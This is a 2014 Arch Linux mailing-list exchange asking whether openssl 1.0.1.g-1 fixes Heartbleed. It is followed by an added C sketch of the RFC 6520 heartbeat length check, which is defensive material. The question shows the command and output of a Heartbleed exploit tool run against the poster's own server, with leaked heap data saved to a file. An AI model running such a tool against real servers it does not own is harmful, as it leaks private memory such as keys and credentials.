[arch-general] Does openssl 1.0.1.g-1 close the heartbleed exploit?

Dimitris Zervas dzervas at dzervas.gr
Fri Apr 25 03:48:11 EDT 2014


I tested my server after the update and found no problems...
On Apr 25, 2014 10:41 AM, "David C. Rankin" <drankinatty at suddenlinkmail.com> wrote:

> Guys,
>
>   I was testing my boxes after updating to openssl 1.0.1.g-1 with heartbleed.c
> and I am still able to grab and decrypt ssl packets. The openssl security note
> says 1.0.1.g is not affected by the bug, but I can still get a 64k chunk of data
> back from my server using the heartbleed.c test. (if I'm reading the output
> correctly) Am I maybe doing something wrong? It is worth asking to be sure.
>
> Archlinux server: phoinix - openssl 1.0.1.g-1
>
> from client machine:
>
>  $ ./heartbleed386 -s 192.168.7.16 -p 443 -f outph -t 1
> [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
> [ =============================================================
> [ connecting to 192.168.7.16 443/tcp
> [ connected to 192.168.7.16 443/tcp
> [ <3 <3 <3 heart bleed <3 <3 <3
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ heartbleed leaked length=65535
> [ final record type=24, length=16384
> [ wrote 16381 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=42
> [ decrypting SSL packet
> [ final record type=24, length=18
> [ wrote 18 bytes of heap to file 'outph'
> [ done.
>  $ ls -al outph
> -rwx------ 1 david david 65554 Apr 25 01:43 outph
>  $ hexdump -C outph
> <snip - a lot more, with CN and other cert info visible>
>
>   Can anyone confirm the openssl 1.0.1.g-1 fix against their arch server? The
> information I get back in response to heartbleed has been decrypted -- that
> leads me to believe the current openssl 1.0.1.g-1 may be suspect as well. Or am
> I looking at this wrong?
>
>   The ./heartbleed output that concerns me is:
>
> [ heartbleed leaked length=65535
>
>   However, each of the subsequent calls by ./heartbleed returned only ~16408,
> which if I understand correctly is the max that should be returned after the fix:
>
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
>
>   Is this the expected fixed behavior, or does this still reflect a
> vulnerability present? What say the experts? Thanks.
>
> --
> David C. Rankin, J.D.,P.E.
>
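
For reference alongside the question above, an added example (not part of either post and not OpenSSL's source): a minimal C sketch of the receive-side length check RFC 6520 requires, under which a heartbeat request whose claimed payload_length exceeds the record actually received is silently discarded. The names hb_respond and hb_demo and the sample record are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define HB_REQUEST   1
#define HB_RESPONSE  2
#define HB_PADDING  16   /* RFC 6520: at least 16 bytes of padding */

/* rec/rec_len: one decrypted heartbeat message as actually received.
 * Returns the response length written to out, or 0 when the message
 * must be silently discarded (no response is sent at all). */
size_t hb_respond(const uint8_t *rec, size_t rec_len,
                  uint8_t *out, size_t out_cap)
{
    /* Too short to hold type + length + minimum padding, or not a request. */
    if (rec_len < 1 + 2 + HB_PADDING || rec[0] != HB_REQUEST)
        return 0;

    size_t payload = ((size_t)rec[1] << 8) | rec[2];  /* sender's claim */
    size_t need = 1 + 2 + payload + HB_PADDING;

    if (need > rec_len)   /* claim exceeds the bytes that really arrived */
        return 0;
    if (need > out_cap)   /* caller's buffer too small */
        return 0;

    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);         /* copy bounded by rec_len */
    memset(out + 3 + payload, 0, HB_PADDING);  /* real stacks use random padding */
    return need;
}

/* Constructed sample: 4-byte payload "ping" plus 16 padding bytes
 * (23 bytes on the wire), with the length field set to claimed_len. */
size_t hb_demo(uint16_t claimed_len)
{
    uint8_t rec[23] = { HB_REQUEST, 0, 0, 'p', 'i', 'n', 'g' };
    uint8_t out[1 + 2 + 65535 + HB_PADDING];

    rec[1] = (uint8_t)(claimed_len >> 8);
    rec[2] = (uint8_t)(claimed_len & 0xff);
    return hb_respond(rec, sizeof rec, out, sizeof out);
}
```

With this check in place, an honest request gets its own payload echoed back, while a request claiming more than it sent produces no heartbeat response at all.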

